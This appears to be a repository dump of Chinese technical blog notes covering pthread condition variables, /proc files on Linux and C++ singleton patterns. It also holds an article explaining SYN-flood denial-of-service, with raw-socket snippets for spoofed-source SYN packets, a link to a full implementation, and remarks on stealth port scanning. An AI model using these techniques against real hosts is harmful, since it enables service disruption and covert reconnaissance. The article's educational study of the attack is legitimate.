`pthread_cond_signal`简化一下就一行代码`lll_futex_wake (&cond->__data.__futex, 1, pshared)`;`pthread_cond_broadcast`简化一下也是一行代码`lll_futex_wake (&cond->__data.__futex, INT_MAX, pshared)`。简而言之,`pthread_cond_signal`只唤醒一个线程,根据scheduler策略来,`pthread_cond_broadcast`唤醒所有。 43 | 44 | ### 小结 45 |   本课内容好像并不多也,**Good Luck! Have Fun!** 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | -------------------------------------------------------------------------------- /syn-flood.md: -------------------------------------------------------------------------------- 1 | SYN-Flood简易实现和原理解析 2 | =========================== 3 | 4 | ## Prepare Reading 5 | ### Relevant Reading 6 | - IP RFC: [https://tools.ietf.org/html/rfc791](https://tools.ietf.org/html/rfc791) 7 | - TCP RFC: [https://tools.ietf.org/html/rfc793](https://tools.ietf.org/html/rfc793) 8 | - TCP state machine: [http://tcpipguide.com/free/t_TCPOperationalOverviewandtheTCPFiniteStateMachineF-2.htm](http://tcpipguide.com/free/t_TCPOperationalOverviewandtheTCPFiniteStateMachineF-2.htm) 9 | 10 | ### Why am I doing this? 11 | 12 |   最近在重读UNP(Unix Network Programming),发现以前不懂的太多,只能一味的接受书上所述,未能提出过疑问,甚至有些东西都看不大懂。重读之后,发现忽略掉的细节有点太多,最先发现的就是`listen(sockfd, backlog)`里的`backlog`参数是一个有限而且很小的`kernel`维护的一个队列,很容易就被耗尽了,这就给了不怀好意的人可乘之机,即所谓的`SYN FLOOD`,正文就是浅说`SYN FLOOD`的简易实现和原理解析。
13 | 14 | ## SYN FLOOD原理解析 15 |   `SYN FLOOD`就是通过半连接去耗尽目标主机、目标端口的`kernel`资源,导致目标主机拒绝所有来自目标端口的合法请求,即所谓的`Dely Of Service`(DOS攻击),如果通过一个集群攻击同一个目标主机,即`Distributed Dely Of Service`(DDOS攻击)。
16 |   这里就不提老生常谈的`TCP`三次握手,四次握手,以及`TCP`状态转换图了,这块知识生疏了可以去翻翻`Prepare Reading`里的内容。 17 |   当`client`发送完一个`SYN`请求,`server`会回一个`SYN/ACK`,然后等待下一个`ACK`,那么此次连接就算成功建立了。那么,如果我们不给`server`回这个`ACK`呢,那么`server`的TCP状态会一直维持在`SYN_RCVD`状态,并触发超时重传,一定次数后回到`CLOSED`状态,但是每个`socket`的半连接资源是有限的,这样就会耗尽某个服务的半连接资源,导致拒绝服务攻击。
18 |    
19 |    
20 |   非常抱歉,我忘记截`TCP`包的图了,大伙儿自己用`wireshark`或者`tcpdump`抓一个看看就知道啦。
21 | 22 | ## SYN FLOOD简易实现   23 |   首先我们肯定是不能走正常的`TCP`系统调用的,因为这样会触发`TCP`状态转换的正常流程,即使你设置了一个`NONBLOCKING`的`socket`去`connect``server`,虽然`connect`发送完`SYN`后立即返回,然后你可以关闭该`socket`不发最后一个`ACK`,但是当`server`的`SYN/ACK`过来时,`kernel`发现此端口并未打开,会直接发送`RST`给`server`,导致`server`关闭`TCP`连接,并不能产生一个半连接。
24 |   那么正确的做法是什么呢?
25 |   通过`raw socket`,`raw socket`可以直接绕过`TCP`发送各种`TCP`包,`raw socket`存在的目的本来是为测试用的,所以你必须有`root`权限才能使用。怎么才能有`root`权限呢?其一,`root`设置了某个应用的`SUID`位,类似于`passwd`;其二,你在`sudo`组里面;其三,你就是`root`。
26 |   下面看一下`IP`和`TCP`的header,摘自`RFC`:
27 |    
28 |    
  29 |   具体字段的具体含义我就不一一解释了,具体可以去翻`RFC`,因为我也是这么过来的。
30 |   下面说一下代码里面需要注意的地方:
31 | ``` 32 | int syn_socket = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); 33 | rc = setsockopt(syn_socket, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)); 34 | ``` 35 |   一定要设置`IP_HDRINCL`使用我们自己的`IP header`,这样才能造成一个FLOOD。为什么呢?因为我们必须随机`源IP地址`,让目标主机将`SYN/ACK`发往各个不同的`源IP地址`,如果路由是通的,那么`源IP地址`主机将会发一个`RST`导致连接关闭,不通则会导致多次超时重传,目标主机维护一堆没用的半连接,服务资源耗尽,目的达到。
36 | ``` 37 | syn_header.ip_header.check = 0; 38 | syn_header.ip_header.check = checksum((uint16_t *)&syn_header.ip_header, sizeof(syn_head er.ip_header)); 39 | 40 | syn_header.tcp_header.th_sum = 0; 41 | syn_header.tcp_header.th_sum = tcp4_checksum(syn_header.ip_header, syn_header.tcp_header 42 | ``` 43 |   一定要将`iphdr.check`和`tcphdr.th_sum`赋`0`,然后再计算`checksum`,`RFC`里有提到这一点,所以我们也这么实现。 44 | ``` 45 | syn_header.ip_header.tot_len = htons(IP_HDRLEN + TCP_HDRLEN); 46 | 47 | syn_header.tcp_header.th_sport = htons((uint16_t)config.local_port); 48 | syn_header.tcp_header.th_dport = htons((uint16_t)config.remote_port); 49 | ``` 50 |   设置`header`的时候多字节成员一定要进行网络地址转换`htons()`、`htonl()`之类。 51 | 52 | ## Talk Is Cheap, Show You My Code! 53 |   Github地址:[https://github.com/linghuazaii/syn-flood-implement](https://github.com/linghuazaii/syn-flood-implement)
54 |   刚开始犯了一个很愚蠢的错误:为什么我发完`SYN`也收到`SYN/ACK`了,`kernel`却发送了`RST`?当时是本机测本机,原因是:逗逼楼主,`raw socket`又不会触发`TCP`状态机,一个`CLOSED`状态的`socket`收到`SYN/ACK`,你还指望我给你回一个`ACK`,呵呵,`RST`死你~
55 |    
56 |   但是我也并没能突破`kernel`的保护机制,`kernel`为每个`socket`维护的半连接队列增加到一定程度就不再自动增加了,到这里,学习目的就达到啦,有闲心可以翻翻`kernel`源码,应该可以很容易突破`kernel`的保护机制,道高一尺魔高一丈嘛。
57 |    
58 | 59 | ## 闲话 60 | - `HTTPS`出现的一个原因是因为可以监控网络上的`TCP`包,窃取`SYN Sequence`值和其他信息来造成中间人攻击,所以`HTTPS`出现了,最主要的目的是提供认证。 61 | - `raw socket`还可以用来对四次握手制造`SYN FLOOD`。 62 | - `raw socket`可以通过向指定端口发送`SYN`包并检查是否收到`SYN/ACK`来实现隐藏的端口扫描,并且不会被目标主机记录进日志文件。 63 | - `raw socket`可以用来搞事啊~ 64 | - 暂时就写这么多吧。   65 | 66 | ## 结语 67 |   **Merry Christmas!!!** 68 | -------------------------------------------------------------------------------- /system-monitor.md: -------------------------------------------------------------------------------- 1 | Sysem Monitor For Linux 2 | ======================= 3 | ``` 4 | buddyinfo 5 | cgroups 6 | cmdline 7 | consoles 8 | cpuinfo 9 | crypto 10 | devices 11 | diskstats 12 | dma 13 | execdomains 14 | filesystems 15 | interrupts 16 | iomem 17 | ioports 18 | kallsyms 19 | kcore 20 | keys 21 | key-users 22 | kmsg 23 | kpagecount 24 | kpageflags 25 | latency_stats 26 | loadavg 27 | locks 28 | mdstat 29 | meminfo 30 | misc 31 | modules 32 | mounts 33 | mtrr 34 | net 35 | pagetypeinfo 36 | partitions 37 | sched_debug 38 | schedstat 39 | self 40 | slabinfo 41 | softirqs 42 | stat 43 | swaps 44 | sysrq-trigger 45 | timer_list 46 | timer_stats 47 | uptime 48 | version 49 | vmallocinfo 50 | vmstat 51 | zoneinfo 52 | ``` 53 | 54 | 55 | - `/proc/loadavg`: `0.24 0.33 0.46 2/847 25053`,前三列表示最后1分钟,5分钟,15分钟`CPU`和`IO`的利用率,第四列表示当前运行的`进程数/总进程数`,第五列表示最后一个用过的`进程ID`。 56 | 57 | - `/proc/buddyinfo`: 58 | ``` 59 | Node 0, zone DMA 0 0 0 1 2 1 1 0 1 1 3 60 | Node 0, zone DMA32 43388 23561 21073 4093 683 154 7 2 1 0 0 61 | Node 0, zone Normal 235635 106198 20708 50 0 0 0 0 0 1 0 62 | ``` 63 | `Node 0`表示只有一个`NUMA Node`,`zone DMA`有`16MB`内存,从低地址开始,被一些`legacy devices`使用;`zone DMA32`存在于64位机器,表示低地址开始`4GB`的内存;`zone Normal`在64位机器上表示从`4GB`开始的内存。其余几列的固定大小的内存块数目(relevant reading: [buddy algorithm](https://www.cs.fsu.edu/~engelen/courses/COP402003/p827.pdf)),分别为`free`状态的`4KB 8KB 16KB 32KB 64KB 128KB 256KB 512KB 1MB 2MB 4MB`内存块数目,Eg. `DMA Zone`有`32KB + 2 * 64KB + 128KB + 256KB + 1MB + 2MB + 3 * 4MB = 15MB544KB`处在`free`状态的内存块,这个数据可以用来查内存碎片情况。 64 | - `/proc/cgroups` 65 | ``` 66 | subsys_name hierarchy num_cgroups enabled 67 | cpuset 0 1 1 68 | cpu 0 1 1 69 | cpuacct 0 1 1 70 | memory 0 1 1 71 | devices 0 1 1 72 | freezer 0 1 1 73 | net_cls 0 1 1 74 | blkio 0 1 1 75 | perf_event 0 1 1 76 | hugetlb 0 1 1 77 | ``` 78 | 四列分别表示`controller name`,`hierarchy`全0表示所有`controller`挂载在`cgroups v2 single unified hierarchy`,`num_cgroups`表示有多少个`control groups`挂载在这个`controller`上,`enabled`表示`controller`状态。(relevant reading: [cgroups](http://man7.org/linux/man-pages/man7/cgroups.7.html)) 79 | 80 | - `/proc/cmdline`: 81 | ``` 82 | root=LABEL=/ console=ttyS0 LANG=en_US.UTF-8 KEYTABLE=us 83 | ``` 84 | 表示`kernel`启动的时候传给`kernel`的参数。 85 | 86 | - `/proc/consoles`: 87 | ``` 88 | ttyS0 -W- (EC p a) 4:64 89 | ``` 90 | 所连接的`consoles`,`ttyS0`表示`device name`,`W`表示可写,`EC p a`分别表示`Enabled``Preferred console``used for printk buffer``safe to use when cpu is offline`,`4:64`表示`major number:minor number`。(relevant reading: [/proc/consoles](https://www.kernel.org/doc/Documentation/filesystems/proc.txt)) 91 | 92 | - `/proc/cpuinfo`: 93 | ``` 94 | processor : 0 95 | vendor_id : GenuineIntel 96 | cpu family : 6 97 | model : 63 98 | model name : Intel(R) Xeon(R) CPU E5-2676 v3 @ 2.40GHz 99 | stepping : 2 100 | microcode : 0x25 101 | cpu MHz : 2400.058 102 | cache size : 30720 KB 103 | physical id : 0 104 | siblings : 4 105 | core id : 0 106 | cpu cores : 2 107 | apicid : 0 108 | initial apicid : 0 109 | fpu : yes 110 | fpu_exception : yes 111 | cpuid level : 13 112 | wp : yes 113 | flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx rdtscp lm constant_tsc rep_good nopl xtopology eagerfpu pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm abm xsaveopt fsgsbase bmi1 avx2 smep bmi2 erms invpcid 114 | bogomips : 4800.11 115 | clflush size : 64 116 | cache_alignment : 64 117 | address sizes : 46 bits physical, 48 bits virtual 118 | power management: 119 | ``` 120 | `cpu family`、`model`、`stepping`表示`cpu`架构类型区分,`microcode`记录更新的版本号或者类似的信息,`cache size`表示`cpu L2 cache`的大小,这里为`30M`,`physical id``processor``cpu cores``siblings``core id`表示只有一块物理`cpu`,但是有四个`processor`,可以同时运行四个`hyperthreads`在`0-2 core`上,`flags`表示该`cpu`的特性,`bogomips`表示每秒百万次级别衡量`cpu`什么也不做的情况,`cache_alignment`应该表示是`64bit`对齐的,即`8bytes`,具体没Google到,`address sizes`表示地址总线数,`46 bits physical`表示最大支持内存为`2 ^ 46bytes = 65536GB`,`48 bits virtual`表示`virtual memory`寻址总线数,最大支持的`virtual memory`内存大小为`2 ^ 48bytes = 262144GB`。 121 | 122 | - `/proc/crypto`: 123 | ``` 124 | name : ecb(arc4) 125 | driver : ecb(arc4-generic) 126 | module : ecb 127 | priority : 0 128 | refcnt : 1 129 | selftest : passed 130 | type : blkcipher 131 | blocksize : 1 132 | min keysize : 1 133 | max keysize : 256 134 | ivsize : 0 135 | geniv : 136 | ``` 137 | 表示`kernel`支持的加密算法。 138 | 139 | - `/proc/devices`: 140 | ``` 141 | Character devices: 142 | 1 mem 143 | 4 /dev/vc/0 144 | 4 tty 145 | 4 ttyS 146 | 5 /dev/tty 147 | 5 /dev/console 148 | 5 /dev/ptmx 149 | 7 vcs 150 | 10 misc 151 | 13 input 152 | 108 ppp 153 | 128 ptm 154 | 136 pts 155 | 202 cpu/msr 156 | 203 cpu/cpuid 157 | 253 hidraw 158 | 254 bsg 159 | 160 | Block devices: 161 | 259 blkext 162 | 9 md 163 | 202 xvd 164 | 253 device-mapper 165 | 254 mdp 166 | ``` 167 | 表示系统挂载的设备,以`Character device`和`Block device`区分,区别见[/proc/devices](https://www.centos.org/docs/5/html/5.1/Deployment_Guide/s2-proc-devices.html) 168 | 169 | - `/proc/diskstats`: 170 | ``` 171 | 202 0 xvda 14461686 42539668 1278044167 78747120 281646345 132327060 17709904384 2309947396 0 124008400 2388329900 172 | 202 1 xvda1 14461153 42539028 1278039312 78746860 281646343 132327052 17709904304 2309947396 0 124008176 2388340472 173 | ``` 174 | 表示`block device`的`I/O`状态,各列分别表示`major number`,`minor number`,`device name`,`read成功次数`,`read merge次数`,`sectors read次数`,`reading总耗时(ms)`,`write成功次数`,`write merge次数`,`sector write次数`,`write总耗时(ms)`,`当前正在处理的I/O个数`,`I/O总耗时(ms)`,`I/O加权总耗时(ms)`。 175 | 176 | 177 | -------------------------------------------------------------------------------- /you-really-know-how-to-write-singleton.md: -------------------------------------------------------------------------------- 1 | 你真的知道怎么写Singleton吗? 2 | ============================ 3 | 4 | ### 常见的Singleton写法 5 | ```c 6 | /* singleton.h */ 7 | class Singleton { 8 | public: 9 | static Singleton *getInstance(); 10 | private: 11 | Singleton() {} 12 | ~Singleton() {} 13 | private: 14 | static Singleton *singleton; 15 | }; 16 | 17 | /* singleton.cpp */ 18 | Singleton *Singleton::singleton = NULL; 19 | Singleton *Singleton::getInstance() { 20 | if (singleton == NULL) 21 | singleton = new Singleton(); 22 | return singleton; 23 | } 24 | ``` 25 | 26 | ### 大伙都知道的DCLP问题 27 |   以上的例子放在多线程环境下,可能会多个线程同时执行`singleton = new Singleton()`,造成那么一丢丢的内存泄漏。好的,我们加把锁: 28 | ```c 29 | /* singleton.h */ 30 | class Singleton { 31 | public: 32 | static Singleton *getInstance(); 33 | private: 34 | Singleton() {} 35 | ~Singleton() {} 36 | private: 37 | static Singleton *singleton; 38 | static pthread_mutex_t mutex; 39 | }; 40 | 41 | /* singleton.cpp */ 42 | Singleton *Singleton::singleton = NULL; 43 | pthread_mutex_t Singleton::mutex = PTHREAD_MUTEX_INITIALIZER; 44 | Singleton *Singleton::getInstance() { 45 | if (singleton == NULL) { 46 | pthread_mutex_lock(&mutex); 47 | singleton = new Singleton(); 48 | pthread_mutex_unlock(&mutex); 49 | } 50 | return singleton; 51 | } 52 | ``` 53 | 54 |   这样同样会有一个问题,可能多个线程同时等待`mutex`,然后`singleton = new Singleton()`同样会被多次调用,造成那么一丢丢的内存泄漏。好的,我们在锁里再加一层判断: 55 | ```c 56 | /* singleton.cpp */ 57 | Singleton *Singleton::singleton = NULL; 58 | pthread_mutex_t Singleton::mutex = PTHREAD_MUTEX_INITIALIZER; 59 | Singleton *Singleton::getInstance() { 60 | if (singleton == NULL) { 61 | pthread_mutex_lock(&mutex); 62 | if (singleton == NULL) 63 | singleton = new Singleton(); 64 | pthread_mutex_unlock(&mutex); 65 | } 66 | return singleton; 67 | } 68 | ``` 69 | 70 |   干得不错,但是线程的多核CPU架构,多个CPU的cache line存在一个可见性问题,再加上`new`操作符可能被指令重排,所以运行在不同的CPU core上的多个线程仍然可能同时调用`singleton = new Singleton()`,造成那么一丢丢的内存泄漏。好的,我们用上memory model: 71 | ```c 72 | /* singleton.cpp */ 73 | Singleton *Singleton::singleton = NULL; 74 | pthread_mutex_t Singleton::mutex = PTHREAD_MUTEX_INITIALIZER; 75 | Singleton *Singleton::getInstance() { 76 | Singleton *temp = singleton.load(std::memory_order_relaxed); 77 | std::atomic_thread_fence(std::memory_order_acquire); 78 | if (temp == NULL) { 79 | pthread_mutex_lock(&mutex); 80 | temp = singleton.load(std::memory_order_relaxed); 81 | if (temp == NULL) { 82 | temp = new Singleton(); 83 | std::atomic_thread_fence(std::memory_order_release); 84 | singleton.store(temp, std::memory_order_relaxed); 85 | } 86 | pthread_mutex_unlock(&mutex); 87 | } 88 | return temp; 89 | } 90 | ``` 91 | 92 |   以上便是DCLP(Double-Checked-Locking-Pattern)的最终版,你会发现写一个Singleton又是memory fence,又是atomic操作,简直费劲,下面我们来另一种写法。 93 | 94 | ### 懒人Singleton写法 95 | ```c 96 | /* singleton.h */ 97 | class Singleton { 98 | public: 99 | static Singleton *getInstance() { 100 | return &singleton; 101 | } 102 | private: 103 | Singleton() {} 104 | ~Singleton() {} 105 | private: 106 | static Singleton singleton; 107 | }; 108 | 109 | /* singleton.cpp */ 110 | Singleton Singleton::singleton; 111 | ``` 112 | 113 |   很优雅的规避了DCLP问题,并且多线程安全,为什么多线程安全呢,以下是cpp-reference上的一段解释: 114 | > Non-local variables 115 | > 116 | > All non-local variables with static storage duration are initialized as part of program startup, before the execution of the main function begins (unless deferred, see below). All variables with thread-local storage duration are initialized as part of thread launch, sequenced-before the execution of the thread function begins. 117 | 118 |   类里面的static成员是全局的,会在编译的时候存在.bss段,在程序启动也就是在进入到`_start`后`call main`之前,进行初始化。但是呢,这种写法会存在一些隐患。 119 | 120 | ### static initialization order fiasco 121 |   将设我有另一个同样的Singleton类`SingletonB`: 122 | ```c 123 | class SingletonB { 124 | private: 125 | SingletonB() { 126 | Singleton *singleton = Singleton::getInstance(); 127 | singleton->do_whatever(); 128 | } 129 | } 130 | ``` 131 | 132 |   假定`SingletonB`先于`Singleton`编译,由于`SingletonB`初始化的时候`Singleton`没有初始化,所以程序在`call main`之前就会crash。 133 | 134 | ### 怎么解决 135 |   解决方案很简单,将`static Singleton singleton;`由global scope转为function scope。 136 | ```c 137 | /* singleton.h */ 138 | class Singleton { 139 | public: 140 | static Singleton *getInstance() { 141 | static Singleton singleton; 142 | return &singleton; 143 | } 144 | private: 145 | Singleton() {} 146 | ~Singleton() {} 147 | }; 148 | /* 没有singleton.cpp */ 149 | ``` 150 | 151 |   这样只有在第一次调用`Singlton::getInstance()`才会初始化`singleton`。而且,该解决方案在C++11的前提下是线程安全的,以下是cpp-reference的解释: 152 | > If multiple threads attempt to initialize the same static local variable concurrently, the initialization occurs exactly once (similar behavior can be obtained for arbitrary functions with std::call_once). 153 | > 154 | > Note: usual implementations of this feature use variants of the double-checked locking pattern, which reduces runtime overhead for already-initialized local statics to a single non-atomic boolean comparison. (since C++11) 155 | 156 |   [这个是我在StackOverflow上抛出的一个问题](https://stackoverflow.com/questions/44838641/what-bugs-will-my-singleton-class-cause-if-i-write-it-like-this) 157 | 158 | ### Reference 159 | - [Double Checked Locking Pattern](https://en.wikipedia.org/wiki/Double-checked_locking) 160 | - [c++ memory model](http://en.cppreference.com/w/cpp/language/memory_model) 161 | - [memory fence](https://en.wikipedia.org/wiki/Memory_barrier) 162 | - [what every programmer should know about memory](https://people.freebsd.org/~lstewart/articles/cpumemory.pdf) 163 | - [c++ initialization](http://en.cppreference.com/w/cpp/language/initialization) 164 | - [static initialization fiasco](https://isocpp.org/wiki/faq/ctors#static-init-order) 165 | 166 | ### 小结 167 |   **GOOD LUCK, HAVE FUN!** 168 | --------------------------------------------------------------------------------